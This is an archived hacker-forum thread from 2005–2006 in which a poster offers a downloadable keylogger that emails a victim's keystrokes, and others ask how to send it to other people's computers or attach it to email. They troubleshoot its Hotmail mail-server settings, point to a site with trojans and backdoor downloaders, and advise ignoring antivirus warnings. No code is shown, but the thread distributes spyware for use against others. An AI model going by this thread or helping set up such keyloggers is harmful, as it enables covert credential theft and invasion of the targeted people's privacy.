PDA

View Full Version : Get your keymailer here.

carlo
10-07-2005, 11:08 AM
Since people have been b***ing me for a keylogger i have uploaded one to my sever. This keylogger will send you all the keys pressed by email. You can get it here (http://cookielogger.t*5.com/skl0.*.zip)

I hope this helps.

kslob
10-15-2005, 10:23 AM
If you use hotmail hacker gold, you will be in bad situration. What this software do is to send the target one email, saying that you are hacking him(her).

Dear target@hotmail.com, I have some upsetting news Someone with the email
address source@hotmail.com is trying to hack into your email account!

clsuresh
10-17-2005, 03:07 AM
Please can someone explain me how a keymailer works, i.e after the exe file is downloaded what is to be done

mk21bob
12-07-2005, 09:52 PM
Carlo
Is there a way for someone using a Mac with Os X to send a keylogger to someone using a PC.

Chill
12-24-2005, 11:50 AM
OK!!!

I need help.... I am not getting a e-mail back to me with the logs....

here is what i have also.... for info...

mx2.hotmail.com
joke280@hotmail.com

Internet Explorer- (added to list.)

It says use mx*. or mx2. for hotmail..... i tryed both and have waited a week for each of them to reply... there is no luck at all....

WHy wont it send any logs to me... i know people have it because i am testing it on my friend.... *he knows about it*...

UMmm carlo im having the same problem as that dude can u reply plz dude
THanks

cyborg
12-24-2005, 12:20 PM
are you sure you have used mx 2 because it worked for me!
mx2.hotmail.com

Chill
12-24-2005, 12:37 PM
how long did the message take to come to u?
and yes im postive but ill try again..

Ezekiel
12-25-2005, 12:37 PM
This is the site that skl keylogger was originally from

http://www.elitec0ders.net/keylogers.htm

The keyloggers section has * good keymailers, elite keylogger has more features than skl though. The site also has some very small backdoor downloaders (some are <2kb) and some trojans, although you can find better trojans elsewhere.

Zero Drive
12-31-2005, 06:10 PM
UMmm carlo im having the same problem as that dude can u reply plz dude
THanks

Microsoft alternates between the 4 mx servers. mx2 was probably down for maintenance or blocking all unauthenticated access. Piece of advice: don’t mess with Microsoft. Don’t quote me on this but last time I checked, Gmail and Yahoo! work fine.:)

wazzup973
01-05-2006, 02:13 AM
whenever i download it the readme shows up nothin else.

Alucard
01-07-2006, 04:01 PM
how do u even attach a keylogger to a email :confused:

emily
03-08-2006, 07:09 PM
This is the site that skl keylogger was originally from

http://www.elitec0ders.net/keylogers.htm

The keyloggers section has * good keymailers, elite keylogger has more features than skl though. The site also has some very small backdoor downloaders (some are <2kb) and some trojans, although you can find better trojans elsewhere.

When I went to UnZip Elite Keylogger, it turned out to be a Trojan. :( Are the others as well?

Ezekiel
03-09-2006, 11:17 AM
When I went to UnZip Elite Keylogger, it turned out to be a Trojan. :( Are the others as well?

Of course it will be detected, it IS a trojan, all keyloggers are trojans, with the purpose of sending logged keystrokes. I don't know why people download programs that they know should be detected by antivirus, then when it is they get scared and think it will infect them or something. All trojans/keyloggers/viruses you can download will be detected, just ignore your AV.

The_Obscured
10-25-2006, 11:59 PM
Ok, Ive basically followed the programs instructions, installed it, and tested it. I have not recieved any emails. Ive changed the mx# from 2-4 in different tries, still no luck. Also, I click on the skl*.0 file that I had installed in a specific folder and it doesnt do anything when clicked on.

*. Is there a specific folder that I am supposed to install "Create SKL*.0 EXE" in?
2. Does the "LOG SIZE" matter? I changed that number different times as well

Your input would be quite helpul...

Ezekiel
10-26-2006, 04:09 AM
Ok, Ive basically followed the programs instructions, installed it, and tested it. I have not recieved any emails. Ive changed the mx# from 2-4 in different tries, still no luck. Also, I click on the skl*.0 file that I had installed in a specific folder and it doesnt do anything when clicked on.

*. Is there a specific folder that I am supposed to install "Create SKL*.0 EXE" in?
2. Does the "LOG SIZE" matter? I changed that number different times as well

Your input would be quite helpul...

That SKL keylogger is a piece of shit. It doesn't work, and I believe elitec0ders.net has been shut down. Don't trust anything from there, because the admins and members are totally retarded.

There's some input for ya.

itsrich10
10-26-2006, 08:20 PM
I tried this program of yours, it does not work. Can you give more direction.
Maybe I'm doing something wrong.